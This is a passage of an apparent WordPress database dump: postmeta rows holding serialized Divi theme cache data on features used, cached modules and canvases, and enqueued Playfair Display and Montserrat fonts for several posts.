ter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34119,1407,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34120,1407,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34121,1258,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34122,1258,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34115,851,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34116,851,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34117,1407,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34118,1407,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34111,610,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34112,610,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34113,851,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34114,851,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34107,1517,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34108,1517,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34109,610,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34110,610,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34103,1647,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34104,1647,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34105,1517,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34106,1517,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34099,1072,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34100,1072,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34101,1647,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34102,1647,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34096,1322,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34097,1322,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34098,1072,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34090,1173,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34091,1173,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34092,1173,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34093,1173,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34094,1322,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34095,1322,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34085,648,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34086,1400,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34087,1400,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34088,1400,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34089,1400,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34081,720,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34082,648,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34083,648,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34084,648,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34078,720,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34079,720,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34080,720,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34074,703,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34075,703,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34076,703,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34077,703,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34073,1593,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34069,1595,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34070,1593,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34071,1593,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34072,1593,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"in